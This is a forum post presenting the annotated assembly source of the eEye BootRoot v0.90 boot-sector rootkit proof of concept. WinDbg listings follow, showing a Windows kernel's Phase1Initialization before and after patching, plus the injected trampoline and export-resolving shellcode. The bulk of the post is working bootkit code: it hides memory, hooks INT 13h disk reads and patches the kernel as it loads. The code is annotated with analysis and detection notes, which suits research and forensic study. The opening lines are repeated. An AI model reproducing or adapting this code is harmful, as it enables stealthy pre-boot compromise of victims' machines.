Hi everyone.
In this thread I want to share the assembly source of this sample, eEye BootRoot v0.90 (a 2005 boot-sector rootkit proof of concept), followed by WinDbg output showing the kernel before and after its patch.
This is the original kernel code:
Here is the Patched Kernel Code:
Thank you all for reading...
In this thread I want to share the assembly source of this sample, eEye BootRoot v0.90 (a 2005 boot-sector rootkit proof of concept), followed by WinDbg output showing the kernel before and after its patch.
Code:
;===============================================================
; eEye BootRoot v0.90 Last updated: 08/08/2005
;---------------------------------------------------------------
; Demonstration of the capabilities of custom boot sector code
; on a Windows NT-family system.
;
; Derek Soeder - eEye Digital Security - 04/02/2005
;===============================================================
.486p                                   ; MASM syntax; 486 privileged mode so the 32-bit operands (EAX, dword ptr) used below assemble in 16-bit code
.model tiny
BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h
BOOTROOT_SIZE EQU 200h                  ; one 512-byte sector: the image that is copied out of the boot sector at install time
BOOTROOT GROUP BRCODE16, BRDATA         ; BRDATA (the 32-bit patch function and its linear-address cells, referenced below) is not part of this listing
ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
BRCODE16 SEGMENT byte use16             ; 16-bit real-mode code; all offsets below are relative to @BRCODE16_START
@BRCODE16_START EQU $
;###################################
;## Boot-Time Installation Code ##
;###################################
;
; Initialization
;
cli                                     ; interrupts off while the stack and the INT 13h vector are being replaced (STI again after the far return below)
xor bx, bx
mov ss, bx
mov ss:[BOOTORG - 2], sp                ; save the BIOS-supplied SP in the word just below our load address ...
mov sp, (BOOTORG - 2)                   ; ... and run our own stack downward from there (SS = 0); pushes never overwrite the saved word
push ds
pushad                                  ; preserved so the real MBR later sees the registers the BIOS handed us
mov ds, bx                              ; DS = 0: the BIOS data area and the IVT are addressed directly below
; Reserve 1KB conventional memory for our memory-resident code
dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs
                                        ; Lowering the BDA base-memory count hides the top 1KB of conventional memory from the loader;
                                        ; together with an INT 13h vector pointing into that region (set below) this is a classic
                                        ; bootkit indicator that a forensic check of the BDA / IVT can detect.
mov ax, ds:[0413h]
shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment)
mov es, ax                              ; ES = segment of the reserved block (linear = KB * 1024, so the block is 1KB-aligned)
; Copy ourselves to reserved memory and initialize the rest to zeroes
cld
mov si, BOOTORG
xor di, di
mov cx, BOOTROOT_SIZE / 2
rep movsw                               ; 512 bytes: the whole boot sector, ES:0000 <- 0000:7C00; leaves CX = 0
xor ax, ax
mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h ; CH = 1, CL still 0 from REP MOVSW -> CX = 100h words = the remaining 512 bytes
rep stosw                               ; zero-fill the second half of the block; CX = 0 again on exit
; Install our INT 13h hook
mov eax, ds:[bx + (13h*4)]              ; BX = 0: read the current INT 13h far pointer from the IVT (0000h:004Ch)
mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler (written into the resident copy, which is the copy that will run)
mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler
mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier)
; Load and execute MBR from first hard drive (do this from resident code)
push es
push @BootFromHDD
retf                                    ; far "jump" into the resident copy: CS = ES, IP = @BootFromHDD
@BootFromHDD:
sti
mov es, cx ; CX = 0 from above REP STOSW
mov ax, 0201h ; AL = number of sectors
inc cx ; CH = cylinder; CL = sector and high bits of cylinder
mov dx, 0080h ; DH = head; DL = drive number
mov bh, (BOOTORG / 100h) ; ES:BX -> destination buffer
int 13h ; INT 13h/AH=02h: Read sector(s) into memory
                                        ; Reads CHS 0/0/1 of the first fixed disk (the real MBR) to 0000h:7C00h, overwriting this
                                        ; sector's original copy. Drive 80h is hard-coded rather than taken from the DL the BIOS passed in.
                                        ; This request already goes through the hook installed above (AH = 02h), so the MBR is scanned too.
                                        ; CF is not checked: on a failed read 0000h:7C00h would still hold this code and the far jump
                                        ; below would re-run the installer (another KB reserved, another hook layered on top).
popad
pop ds
pop sp                                  ; restore the BIOS-supplied SP (SS is still 0)
db 0EAh ; JMP FAR 0000h:7C00h
dw BOOTORG, 0000h                       ; hand control to the freshly loaded MBR as if the BIOS had loaded it
;##################################
;## INT 13h Hook Real-Mode ISR ##
;##################################
@Int13Hook:
                                        ; Resident INT 13h ISR. Only disk reads (AH = 02h / 42h) are intercepted; everything else is
                                        ; passed straight through to the saved original vector.
pushf
cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
je short @Int13Hook_ReadRequest
cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
je short @Int13Hook_ReadRequest
popf
db 0EAh ; JMP FAR INT13HANDLER
INT13HANDLER EQU $
dd ?                                    ; operand of the JMP FAR above: the original INT 13h vector, filled in by the installer
@Int13Hook_ReadRequest:
mov byte ptr cs:[INT13LASTFUNCTION], ah ; self-modifying: rewrites the imm8 of the `mov ah, 00h` below so the function number survives the call
; Invoke original handler to perform read operation
popf
pushf ; push Flags because we're simulating an INT
call dword ptr cs:[INT13HANDLER] ; call original handler (it returns with IRET, consuming the Flags pushed here; the BIOS reports status in CF)
jc short @Int13Hook_ret ; abort immediately if read failed
pushf
cli
push es
pusha
mov ah, 00h                             ; the imm8 here is overwritten with the caller's AH (see above)
INT13LASTFUNCTION EQU $-1
cmp ah, 42h
jne short @Int13Hook_notextread
lodsw                                   ; DS:SI -> caller's disk address packet; +00h size/reserved skipped
lodsw ; +02h WORD number of blocks to transfer (-> AX)
les bx, [si] ; +04h DWORD transfer buffer (-> ES:BX; same register shape AH=02h already uses: AL = count, ES:BX = buffer)
@Int13Hook_notextread:
; Scan sector for a signature of the code we want to modify
test al, al
jle short @Int13Hook_scan_done          ; only the low byte of the count is used and it is treated as signed: 0 or >= 80h sectors -> not scanned
cld
mov cl, al
mov al, 8Bh
shl cx, 9 ; (AL * 200h)                 ; CX = AL * 512 bytes; AL <= 7Fh here so it fits in 16 bits, and the stale CH is shifted out
mov di, bx
@Int13Hook_scan_loop:
; 8B F0 MOV ESI, EAX
; 85 F6 TEST ESI, ESI
; 74 21 JZ $+23h
; 80 3D ... CMP BYTE PTR [ofs32], imm8
; (the first 6 bytes of this signature exist in other modules!)
; The scan is per read request: a signature split across two requests is missed, and the raw
; sector bytes must be the unmodified module image (no compression/encryption on the read path).
repne scasb                             ; find the next 8Bh in ES:DI..ES:DI+CX; DI ends one past it
jne short @Int13Hook_scan_done
cmp dword ptr es:[di], 74F685F0h        ; bytes F0 85 F6 74 (little-endian) = MOV ESI,EAX / TEST ESI,ESI / JZ
jne short @Int13Hook_scan_loop
cmp word ptr es:[di+4], 8021h           ; bytes 21 80 = JZ displacement + CMP opcode; these compares can read a few bytes past the buffer end
jne short @Int13Hook_scan_loop
mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32] (6 bytes, exactly the length of the three instructions replaced)
mov eax, cs
shl eax, 4                              ; EAX = linear base of the resident 1KB block
add cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax ; relocate a pointer cell inside the 32-bit patch function (defined outside this listing, placed right after BRCODE16)
add ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE ; EAX = linear address of the 32-bit patch function
mov cs:[PATCHFUNC32_LINEAR], eax ; should be okay to add to AX, since we can't cross 1KB boundary (the block is 1KB-aligned, so no carry into the high word)
add ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE) ; EAX = linear address of the PATCHFUNC32_LINEAR cell
mov es:[di+1], eax                      ; the CALL's [ofs32] operand -> that cell; assumes this low-memory linear address is still valid when the patched 32-bit code runs (the mapping is not shown here)
@Int13Hook_scan_done:
popa
pop es
popf
@Int13Hook_ret:
retf 2 ; discard saved Flags from original INT (pass back CF, etc.)
@BRCODE16_END EQU $
BRCODE16_SIZE EQU (@BRCODE16_END - @BRCODE16_START) ; size of the 16-bit part; used above as the offset of the 32-bit patch segment inside the resident image
BRCODE16 ENDS                           ; the BRDATA / 32-bit patch function segment that follows is not included in this listing
This is the original kernel code (WinDbg disassembly of nt!Phase1Initialization; the instruction the patch targets is the `call nt!IoInitSystem` at 806a0aab):
Code:
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19 push 0x19
806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff push dword ptr [ebp-0x470]
806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000 call nt!XIPInit (806afe6a)
806a0a9c 6a4b push 0x4b
806a0a9e 6a19 push 0x19
806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff push dword ptr [ebp-0x470]
806a0aab e844e6ffff call nt!IoInitSystem (8069f0f4)
806a0ab0 84c0 test al,al
806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64 push 0x64
806a0aba 53 push ebx
806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00 mov esi,0xf003f
806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff mov esi,[ebp-0x470]
806a0ae3 56 push esi
806a0ae4 6a02 push 0x2
806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17)
806a0aeb 6a50 push 0x50
806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01 push 0x1
806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f)
806a0b03 84c0 test al,al
806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56 push esi
Here is the patched kernel code. The only change is at 806a0aab, where `call nt!IoInitSystem` has been redirected to a trampoline at 806ebe00 (memory dump and disassembly follow). Note that this differs from the `8B F0 85 F6 74 21` signature the v0.90 source above scans for, so the kernel patch shown here appears to come from a different build of the patch function than the one in that listing:
Code:
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758)
806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d)
806a0a84 6a19 push 0x19
806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0a8b ffb590fbffff push dword ptr [ebp-0x470]
806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx
806a0a97 e8cef30000 call nt!XIPInit (806afe6a)
806a0a9c 6a4b push 0x4b
806a0a9e 6a19 push 0x19
806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0aa5 ffb590fbffff push dword ptr [ebp-0x470]
806a0aab e850b30400 call 806ebe00
806a0ab0 84c0 test al,al
806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f)
806a0ab8 6a64 push 0x64
806a0aba 53 push ebx
806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1)
806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx
806a0ac6 be3f000f00 mov esi,0xf003f
806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6)
806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl
806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940)
806a0add 8bb590fbffff mov esi,[ebp-0x470]
806a0ae3 56 push esi
806a0ae4 6a02 push 0x2
806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17)
806a0aeb 6a50 push 0x50
806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5)
806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2)
806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed)
806a0afc 6a01 push 0x1
806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f)
806a0b03 84c0 test al,al
806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524)
806a0b0b 56 push esi
806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e ...............~
806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd ................
806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d ......d........}
806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0 .........E..@...
806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa .......@........
806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75 .j.P...........u
806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd .......P.6......
806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85 ..d.$...........
806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1 .....H49........
806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff ..@I...T.@......
806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80 ..$h..i...$h.pM. <--- trampoline that replaces the call to nt!IoInitSystem at 806a0aab (disassembled below from 806ebe00)
806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f . .P%.....".+.X.
806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59 "..4$hb..7.;...Y
806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00 Yh....j...`.....
806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00 ^.....jjY.......
806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08 .....3.a.t$..T$.
806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b YZ`...R...`.l$(.
806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd E<.T.x...J..Z ..
806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4 .2I.4...3..3..:.
806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b t........;|$$u..
806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b Z$..f..K.Z......
806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8 ....3..D$.a.[Uh.
806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26 t)...3.RR..R...&
806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79 ...\.?.?.\.P.h.y
806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69 .s.i.c.a.l.D.r.i
806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc .v.e.0...h$.&...
806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51 RRj@QRj...j j.VQ
806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3 h....W..Uhb..7..
806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00 .Uh........h....
806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51 h......j.Q.....Q
806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff Qj...PV...3.RRR.
806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24 t$X..Uh_L.....t$
806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00 @...F<..P.PPRRj.
806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3 ...YW2..._X`.HT.
806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00 .a+.....H.......
806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83 `.r..z..J.....a.
806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab .(..P`..........
806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24 aUh..H....V...t$
806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0 ...$....W.F(....
806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57 ..}..NP..2.W.._W
806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00 ....`3..........
806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00 ...a............
806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--- hal.dll image base (806ec000-806ffd80); the trampoline above sits in the bytes immediately below it
806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 ................
806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......
806ebe00 8b1424 mov edx,[esp]
806ebe03 68f4f06980 push 0x8069f0f4
806ebe08 8b0c24 mov ecx,[esp]
806ebe0b 6800704d80 push 0x804d7000
806ebe10 0f20c0 mov eax,cr0
806ebe13 50 push eax
806ebe14 25fffffeff and eax,0xfffeffff
806ebe19 0f22c0 mov cr0,eax ; clear CR0.WP (bit 16) so read-only pages become writable; note that no memory write occurs before WP is restored at 806ebe1f, and ecx (the original call's rel32, 8069f0f4 minus the return address) is presumably consumed by code not shown here
806ebe1c 2bca sub ecx,edx
806ebe1e 58 pop eax
806ebe1f 0f22c0 mov cr0,eax
806ebe22 ff3424 push dword ptr [esp]
806ebe25 6862e00737 push 0x3707e062
806ebe2a e83b000000 call 806ebe6a
806ebe2f 59 pop ecx
806ebe30 59 pop ecx
806ebe31 68ab010000 push 0x1ab
806ebe36 6a00 push 0x0
806ebe38 ffd0 call eax {nt!ExAllocatePool (8050fd66)}
806ebe3a 60 pushad
806ebe3b e800000000 call 806ebe40
806ebe40 5e pop esi
806ebe41 83c615 add esi,0x15
806ebe44 8bf8 mov edi,eax
806ebe46 6a6a push 0x6a
806ebe48 59 pop ecx
806ebe49 f3a5 rep movsd
806ebe4b b180 mov cl,0x80
806ebe4d 8dbe00feffff lea edi,[esi-0x200]
806ebe53 ffe0 jmp eax {81bf06d0}
81bf06d0 33c0 xor eax,eax
81bf06d2 61 popad
81bf06d3 ff74240c push dword ptr [esp+0xc]
81bf06d7 ff542408 call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4
81bf06db 59 pop ecx
81bf06dc 5a pop edx
81bf06dd 60 pushad
81bf06de 87cd xchg ebp,ecx
81bf06e0 e852000000 call 81bf0737
81bf06e5 60 pushad
81bf06e6 8b6c2428 mov ebp,[esp+0x28]
81bf06ea 8b453c mov eax,[ebp+0x3c]
81bf06ed 8b540578 mov edx,[ebp+eax+0x78]
81bf06f1 03d5 add edx,ebp
81bf06f3 8b4a18 mov ecx,[edx+0x18]
81bf06f6 8b5a20 mov ebx,[edx+0x20]
81bf06f9 03dd add ebx,ebp
81bf06fb e332 jecxz 81bf072f
81bf06fd 49 dec ecx
81bf06fe 8b348b mov esi,[ebx+ecx*4]
81bf0701 03f5 add esi,ebp
81bf0703 33ff xor edi,edi
81bf0705 fc cld
81bf0706 33c0 xor eax,eax
81bf0708 ac lodsb
81bf0709 3ac4 cmp al,ah
81bf070b 7407 jz 81bf0714
81bf070d c1cf0d ror edi,0xd
81bf0710 03f8 add edi,eax
81bf0712 ebf2 jmp 81bf0706
81bf0714 3b7c2424 cmp edi,[esp+0x24]
81bf0718 75e1 jnz 81bf06fb
81bf071a 8b5a24 mov ebx,[edx+0x24]
81bf071d 03dd add ebx,ebp
81bf071f 668b0c4b mov cx,[ebx+ecx*2]
81bf0723 8b5a1c mov ebx,[edx+0x1c]
81bf0726 03dd add ebx,ebp
81bf0728 8b048b mov eax,[ebx+ecx*4]
81bf072b 03c5 add eax,ebp
81bf072d eb02 jmp 81bf0731
81bf072f 33c0 xor eax,eax
81bf0731 8944241c mov [esp+0x1c],eax
81bf0735 61 popad
81bf0736 c3 ret
Thank you all for reading...